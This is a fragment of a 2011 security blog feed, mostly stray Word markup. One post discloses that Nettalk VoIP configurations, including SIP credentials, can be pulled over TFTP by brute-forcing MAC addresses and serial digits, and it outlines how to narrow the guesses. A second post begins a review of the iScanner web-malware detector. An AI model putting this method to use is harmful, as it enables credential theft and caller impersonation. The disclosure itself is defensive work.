<w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]><br />
<style>
 /* Style Definitions */
 table.MsoNormalTable
	{mso-style-name:"Table Normal";
	mso-tstyle-rowband-size:0;
	mso-tstyle-colband-size:0;
	mso-style-noshow:yes;
	mso-style-priority:99;
	mso-style-parent:"";
	mso-padding-alt:0in 5.4pt 0in 5.4pt;
	mso-para-margin-top:0in;
	mso-para-margin-right:0in;
	mso-para-margin-bottom:10.0pt;
	mso-para-margin-left:0in;
	line-height:115%;
	mso-pagination:widow-orphan;
	font-size:11.0pt;
	font-family:"Calibri","sans-serif";
	mso-ascii-font-family:Calibri;
	mso-ascii-theme-font:minor-latin;
	mso-hansi-font-family:Calibri;
	mso-hansi-theme-font:minor-latin;}
</style>
<p> <![endif]--></p>
<p class="MsoNormal">In the meantime nettalk should turn off the tftp server or setup a filter on their firewalls / IPS to look for multiple connections from the same IP for different configuration files.</p>
<p class="MsoNormal">06/25/2011 &#8211; Nettalk has not responded yet to my reach out attempts. Thomas has basically changed all his Linkedin information. <span> </span>[RECOMMENDATION] Clients of Nettalk should keep an eye on their phone bills and their personal information. Using the SIP credentials not only can an attacker place a call they can receive calls as well. This means they can impersonate you and gather additional information to use in other unethical ways.</p>
<p class="MsoNormal">If you are visiting my site from Nettalk please feel free to contact me via email. Provide your telephone number and position in that email and I will be more then glad to call you to discuss this.</p>
<p class="MsoNormal"><span class="postbody"><br />
</span></p>
<p>&nbsp;</p>
<div id="_mcePaste" class="mcePaste" style="position: absolute; left: -10000px; top: 451px; width: 1px; height: 1px; overflow: hidden;"><!--[if gte mso 9]><xml> <o:OfficeDocumentSettings> <o:RelyOnVML /> <o:AllowPNG /> </o:OfficeDocumentSettings> </xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:EnableOpenTypeKerning /> <w:DontFlipMirrorIndents /> <w:OverrideTableStyleHps /> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin-top:0in; 	mso-para-margin-right:0in; 	mso-para-margin-bottom:10.0pt; 	mso-para-margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin;} --> <!--[endif] --></p>
<p class="MsoNormal"><span class="postbody"><span style="mso-spacerun: yes;"> </span>Based on the post on the </span><span class="MsoHyperlink"><span style="mso-spacerun: yes;"> </span>Magic Jack Support </span><span class="postbody">forums and the screen shots I took: An attacker can download the configuration of any Nettalk user by knowing the MAC address of the device and the last 4 digits of the device serial number;<span style="mso-spacerun: yes;"> </span>Using a simple brute force method you can quickly pull the configurations of multiple users in matter of hours, if not minutes. To speed up the attack you can find the manufacture of the Ethernet chip in the device and see what numbers they use for the start of the MAC to define that it is theirs. This will cut down the amount of possibilities you need to guess.<span style="mso-spacerun: yes;"> </span>You could even run the code in The Cloud like several password cracking tools use today.</span></p>
</div>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2011%2F06%2Fnettalk-chooses-not-to-protect-client%25e2%2580%2599s-data-privacy%2F&amp;title=Nettalk%20chooses%20not%20to%20protect%20Client%E2%80%99s%20data%20%2F%20Privacy" id="wpa2a_28"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2011/06/nettalk-chooses-not-to-protect-client%e2%80%99s-data-privacy/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Detecting malicious code in webpages iScanner and iScan Script</title>
		<link>http://www.digitaloffensive.com/2011/03/detecting-malicious-code-in-webpages-iscanner-and-iscan-script/</link>
		<comments>http://www.digitaloffensive.com/2011/03/detecting-malicious-code-in-webpages-iscanner-and-iscan-script/#comments</comments>
		<pubDate>Wed, 30 Mar 2011 13:53:10 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=327</guid>
		<description><![CDATA[Detecting malicious code in webpages iScanner and iScan Script iScanner is developed by the folks over at iSecur1ty.org. The latest update of code was in September of 2010. The iScanner application is ruby based application that has many features: Current Features: Ability to scan one file, directory or remote web page / website. Detect and [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Detecting malicious code in webpages iScanner and iScan Script</strong></p>
<p>iScanner is developed by the folks over at iSecur1ty.org. The latest update of code was in September of 2010. The iScanner application is ruby based application that has many features:</p>
<p><strong>Current Features:</strong></p>
<ul>
<li>Ability to scan one file, directory or remote web page / website.</li>
<li>Detect and remove website malwares and malicious code in web pages. This include hidden iframe tags, javascript, vbscript, activex objects, suspicious PHP codes and some known malwares.</li>
<li>Extensive log shows the infected files and the malicious code.</li>
<li>Support for sending email reports.</li>
<li>Ability to clean the infected web pages automatically.</li>
<li>Easy backup and restore system for the infected files.</li>
<li>Simple and editable signature based database.</li>
<li>You can easily send malicious file to iScanner developers for analyzes.</li>
<li>Ability to update the database and the program easily from iScanner&#8217;s server.</li>
<li>Very flexible options and easy to use.</li>
<li>Fast scanner with great performance.</li>
<li>Yes, it&#8217;s FREE!!</li>
</ul>
<p>I found this tool extremely interesting and started playing with it. Overall it is a great tool though I found it was missing some functionality that I wanted.</p>
<p><span id="more-327"></span></p>
<p>1.       It does not have a flag to index and scan the whole site for malicious code.</p>
<p>2.       The database is extremely small and does not detect some common variations of C99 shell.</p>
